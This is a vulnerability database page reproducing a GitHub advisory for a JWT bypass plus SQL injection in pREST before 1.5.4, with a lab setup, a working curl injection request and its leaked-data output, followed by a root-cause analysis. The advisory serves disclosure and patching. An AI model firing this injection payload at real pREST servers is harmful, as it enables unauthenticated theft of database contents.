9.8

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-wm25-j4gw-6vr3

EPSS Score

CWE

CWE-89

Published

7/30/2024

Updated

8/7/2024

KEV Status

Technology

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-wm25-j4gw-6vr3

GHSA-wm25-j4gw-6vr3: pREST vulnerable to jwt bypass + sql injection

Summary

Probably jwt bypass + sql injection or what i'm doing wrong?

PoC (how to reproduce)

Create following files:

docker-compose.yml:

services:
  postgres:
    image: postgres
    container_name: postgres_container_mre
    environment:
      POSTGRES_USER: test_user_pg
      POSTGRES_PASSWORD: test_pass_pg
      POSTGRES_DB: test_db
  prest:
    image: prest/prest
    build: .
    volumes:
      - ./queries:/queries
      - ./migrations:/migrations
    ports:
      - "3000:3000"

Dockerfile:

from prest/prest:latest

COPY ./prest.toml prest.toml

prest.toml:

debug=false
migrations = "./migrations"

[http]
port = 3000

[jwt]
default = true
key = "secret"
algo = "HS256"

[auth]
enabled = true
type = "body"
encrypt = "MD5"
table = "prest_users"
username = "username"
password = "password"

[pg]
URL = "postgresql://test_user_pg:test_pass_pg@postgres:5432/test_db/?sslmode=disable"

[ssl]
mode = "disable"
sslcert = "./PATH"
sslkey = "./PATH"
sslrootcert = "./PATH"

[expose]
enabled = true
databases = true
schemas = true
tables = true

[queries]
location = "/queries"

run commands:

mkdir -p migrations queries
docker compose up --build -d

wait for pg and prest, then run following to add test data to the pg:

export PGPASSWORD=test_pass_pg
docker exec -it postgres_container_mre psql -U test_user_pg -d test_db -c "CREATE TABLE IF NOT EXISTS public.some_table (id int primary key, secret_data text);\
INSERT INTO public.some_table (id, secret_data) VALUES (1, 'some secret text') ON CONFLICT DO NOTHING;"

SQL injection even without jwt token:

curl --location '127.0.0.1:3000/test_db/public".some_table)%20s;--/auth'

output:

[{"id": 1, "secret_data": "some secret text"}]

(GitHub Advisory)

Miggo Vulnerability Database

→

GHSA-wm25-j4gw-6vr3

GHSA-wm25-j4gw-6vr3:

9.8

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-wm25-j4gw-6vr3

EPSS Score

CWE

CWE-89

Published

7/30/2024

Updated

8/7/2024

KEV Status

Technology

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/prest/prest	go	< 1.5.4	1.5.4

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from two key issues: 1) JWT bypass via improper whitelist configuration, and 2) SQL injection through unsanitized input. The root cause was identified in the JWT middleware configuration where viperCfg() in config/config.go set a non-regex whitelist path. The commit diff shows the fix adding a regex anchor (^), confirming the vulnerable pattern allowed path manipulation like '/.../auth' to bypass authentication. This bypass enabled access to SQL endpoints where user-controlled URL parameters were directly interpolated into SQL queries without proper sanitization, leading to injection. The explicit whitelist regex fix in the patch directly correlates to the described vulnerability mechanism.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

9.8

-

Basic Information

Basic Information

Concerned about an active attack path?

GHSA-wm25-j4gw-6vr3: pREST vulnerable to jwt bypass + sql injection

Summary

PoC (how to reproduce)

GHSA-wm25-j4gw-6vr3:

9.8

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

9.8

9.8

Technical Details

Basic Information

Basic Information

GHSA-wm25-j4gw-6vr3: pREST vulnerable to jwt bypass + sql injection

Summary

PoC (how to reproduce)

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI